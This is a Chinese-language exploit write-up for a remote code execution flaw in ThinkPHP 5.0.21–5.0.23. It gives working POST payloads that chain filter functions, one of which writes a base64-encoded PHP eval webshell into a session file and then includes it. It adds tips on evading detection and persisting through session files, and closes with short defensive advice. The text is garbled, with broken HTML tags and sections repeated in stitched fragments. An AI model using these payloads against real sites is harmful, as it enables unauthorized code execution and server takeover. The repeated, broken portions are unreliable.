ThinkPHP 5.0.23 RCE利用链改造技术分析<\/h1>

漏洞背景<\/h2>
在对某网站渗透过程中发现目标系统使用ThinkPHP 5.0.23框架，存在method RCE漏洞。但常规利用方式因`__construct<\/code>关键字被禁用而失效，需要寻找替代利用链。<\/p>`

核心漏洞点<\/h2>

Request类的method方法<\/strong>：允许调用类中的任意方法<\/li>
filter链机制<\/strong>：通过控制filter链可以间接执行代码<\/li>
<\/ul>
利用条件<\/h2>

ThinkPHP版本：5.0.21~5.0.23<\/li>
需要开启debug模式（部分利用链）<\/li>
<\/ul>
利用链分析<\/h2>
1. 基础利用原理<\/h3>
传统利用方式是通过__construct<\/code>方法覆写请求参数和filter链，但当__construct<\/code>被禁用时，需要寻找替代方案。<\/p>
2. 开启debug模式下的利用<\/h3>
2.1 phpinfo执行链<\/h4>
利用步骤<\/strong>：<\/p>

filter链第一个参数为server[REQUEST_METHOD]<\/code>（字符串"POST"）<\/li>
需要找到能接受字符串参数并返回非零整数的函数作为跳板<\/li>
使用error_reporting<\/code>函数作为中介<\/li>
<\/ol>
POC<\/strong>：<\/p>
POST请求：
0=error_reporting&1=phpinfo&_method=filter
<\/code><\/pre>
filter链流程<\/strong>：<\/p>
POST -> error_reporting -> phpinfo -> 输出信息
<\/code><\/pre>
2.2 写入session<\/h4>
利用步骤<\/strong>：<\/p>

使用think\Session::set<\/code>将数据写入session<\/li>
添加base64编码层避免直接查杀<\/li>
<\/ol>
POC<\/strong>：<\/p>
POST \/index.php?a=PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2MnXSkpOyA\/Pg==
0=base64_decode&1=think\Session::set&2=error_reporting&_method=filter
<\/code><\/pre>
filter链流程<\/strong>：<\/p>
输入数据 -> base64_decode -> think\Session::set -> 写入session
<\/code><\/pre>
2.3 包含session文件<\/h4>
利用步骤<\/strong>：<\/p>

使用\think\Cookie::get<\/code>获取Cookie中的字符串作为文件名<\/li>
通过think\__include_file<\/code>包含session文件<\/li>
<\/ol>
POC<\/strong>：<\/p>
POST \/index.php
Cookie: POST=session文件名
0=\think\Cookie::get&1=think\__include_file&2=error_reporting&_method=filter&c=cGhwaW5mbytgpOw==
<\/code><\/pre>
filter链流程<\/strong>：<\/p>
POST -> \think\Cookie::get -> think\__include_file -> 包含执行
<\/code><\/pre>
3. 未开启debug模式的利用<\/h3>
发现当程序执行流程中发生Error时，error_handler<\/code>会触发利用链：<\/p>

在route.php<\/code>文件中引入错误<\/li>
发送payload触发<\/li>
\think\Error<\/code>类的appError<\/code>方法在处理错误时会收集参数，从而触发filter链<\/li>
<\/ol>
版本适应性<\/h2>

5.0.21~5.0.23<\/strong>：上述payload均适用<\/li>
5.0其他版本<\/strong>：需要修改包含session的payload路径<\/li>
<\/ul>
其他版本POC示例<\/strong>：<\/p>
POST \/index.php?a=C:\/phpstudy_pro\/Extensions\/tmp\/tmp\/sess_v6mip0bjhb29prtsiv69f12j93
1=think\__include_file&2=error_reporting&_method=filter&c=cGhwaW5mbygpOw==
<\/code><\/pre>
关键技巧总结<\/h2>

filter链引导<\/strong>：将不可控参数引导至可控参数<\/li>
函数选择<\/strong>：寻找能接受字符串并返回有用值的函数作为跳板<\/li>
多层编码<\/strong>：使用base64等编码方式绕过简单防护<\/li>
错误触发<\/strong>：通过制造框架错误来触发利用链<\/li>
session利用<\/strong>：通过写入和包含session文件实现持久化<\/li>
<\/ol>
防御建议<\/h2>

及时升级ThinkPHP框架至最新安全版本<\/li>
禁用不必要的HTTP方法<\/li>
严格过滤用户输入的_method<\/code>参数<\/li>
限制filter函数的可用范围<\/li>
生产环境务必关闭debug模式<\/li>
<\/ol>

ThinkPHP 5.0.23 RCE利用链改造技术分析<\/h1>

漏洞背景<\/h2>
在对某网站渗透过程中发现目标系统使用ThinkPHP 5.0.23框架，存在method RCE漏洞。但常规利用方式因`__construct<\/code>关键字被禁用而失效，需要寻找替代利用链。<\/p>`

利用链分析<\/h2>

1. 基础利用原理<\/h3>
传统利用方式是通过`construct<\/code>方法覆写请求参数和filter链，但当construct<\/code>被禁用时，需要寻找替代方案。<\/p>`

防御建议<\/h2>

及时升级ThinkPHP框架至最新安全版本<\/li>
禁用不必要的HTTP方法<\/li>
严格过滤用户输入的`_method<\/code>参数<\/li>`
`限制filter函数的可用范围<\/li>`
`生产环境务必关闭debug模式<\/li> <\/ol>`

ThinkPHP 5.0.23 RCE利用链改造技术分析<\/h1>

漏洞背景<\/h2> 在对某网站渗透过程中发现目标系统使用ThinkPHP 5.0.23框架，存在method RCE漏洞。但常规利用方式因__construct<\/code>关键字被禁用而失效，需要寻找替代利用链。<\/p>

利用链分析<\/h2>

1. 基础利用原理<\/h3> 传统利用方式是通过__construct<\/code>方法覆写请求参数和filter链，但当__construct<\/code>被禁用时，需要寻找替代方案。<\/p>

防御建议<\/h2> 及时升级ThinkPHP框架至最新安全版本<\/li> 禁用不必要的HTTP方法<\/li> 严格过滤用户输入的_method<\/code>参数<\/li> 限制filter函数的可用范围<\/li> 生产环境务必关闭debug模式<\/li> <\/ol>

漏洞背景<\/h2>
在对某网站渗透过程中发现目标系统使用ThinkPHP 5.0.23框架，存在method RCE漏洞。但常规利用方式因`__construct<\/code>关键字被禁用而失效，需要寻找替代利用链。<\/p>`

1. 基础利用原理<\/h3>
传统利用方式是通过`construct<\/code>方法覆写请求参数和filter链，但当construct<\/code>被禁用时，需要寻找替代方案。<\/p>`

防御建议<\/h2>

及时升级ThinkPHP框架至最新安全版本<\/li>
禁用不必要的HTTP方法<\/li>
严格过滤用户输入的`_method<\/code>参数<\/li>`
`限制filter函数的可用范围<\/li>`
`生产环境务必关闭debug模式<\/li> <\/ol>`